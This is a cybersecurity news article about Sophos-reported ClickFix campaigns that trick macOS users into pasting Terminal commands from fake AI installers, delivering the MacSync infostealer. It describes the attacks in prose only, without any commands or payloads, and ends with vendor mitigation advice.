ClickFix Lures Deliver MacSync macOS Infostealer via Fake AI Installers

Sophos researchers have uncovered three ClickFix campaigns that deliver a macOS information stealer called MacSync by tricking users into running Terminal commands copied from fake installers and search results. Sophos said the lure focuses on convincing users to paste and execute opaque commands rather than exploiting software vulnerabilities.

According to Sophos, the campaigns appeared in three waves: a November 2025 campaign that used sponsored Google search results pointing to a bogus Google Sites page, a December 2025 malvertising effort that hid behind shared ChatGPT conversations, and a February 2026 push targeting Belgium, India, and parts of the Americas that deployed a new MacSync variant with dynamic AppleScript and in-memory execution techniques.

Sophos noted that the install flow is simple: a user clicks a download button, follows instructions to open Terminal and paste a provided command, which fetches a shell script that asks for the system password and runs the stealer. Sophos warned that refinements to ClickFix social engineering may allow these campaigns to evolve. “Refinements to the typical ClickFix social engineering tactics are therefore one way in which such campaigns may continue to evolve in the future,” Sophos said.

Jamf Threat Labs had flagged ClickFix lures as far back as December 2025, and Microsoft Defender Experts reported similar macOS infostealer activity using copy-paste Terminal prompts and fake installers. Microsoft Defender Experts said attackers are using AppleScript automation, fileless execution, and native macOS utilities to harvest credentials, keychains, and wallet seed phrases.

MacSync is designed to contact hard-coded servers to retrieve an AppleScript payload, quietly collect data such as browser credentials, files, keychain databases, and crypto wallet seed phrases, then attempt to remove traces. Sophos said the February variant added in-memory execution to evade static detectors and complicate incident response.

The campaigns rely heavily on trusted platforms and malvertising. Sophos and Microsoft observed fake landing pages hosted on Cloudflare Pages, Squarespace, and other legitimate hosting services, with ads or sponsored search links steering victims to the trojanized instructions. Rapid7 reported a related trend where compromised WordPress sites impersonate a human verification prompt to push ClickFix implants on visitors. “The best defense for individuals browsing the web is to stay cautious, maintain a zero-trust mindset, use reputable security software, and keep themselves up to date with the latest phishing and ClickFix tactics used by malicious actors,” Rapid7 said.

Other security teams warn the technique scales because developers commonly use curl piped into sh to install legitimate tools. Pillar Security researcher Eilon Cohen said, “The reason is clear: AI and vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials.” Push Security added context on the social engineering: “The pretext is simply the user wanting to install legit software.”

Threat actors including traffic distribution systems and TDS operators are reusing ClickFix and related InstallFix approaches to push a range of stealers and backdoors on both Windows and macOS, Trend Micro and other vendors reported. Rapid7 and Microsoft recommended standard mitigations such as keeping site and plugin software up to date, enabling two-factor authentication for admin accounts, educating users about copy-paste Terminal prompts, monitoring suspicious Terminal activity, and blocking access to known malicious domains.

For users: avoid pasting commands from untrusted sites, do not run unsigned DMGs or unverified installers, and use reputable endpoint protection and browser protections. For administrators: apply updates, harden web platforms, and scan for injected scripts or unauthorized admin accounts, Rapid7 and Microsoft advised.

For more detailed advice, see Cybersecurity Waala’s guide on how to protect yourself from cyber attacks.

#macOS #infostealer #ClickFix #cybersecurity #malvertising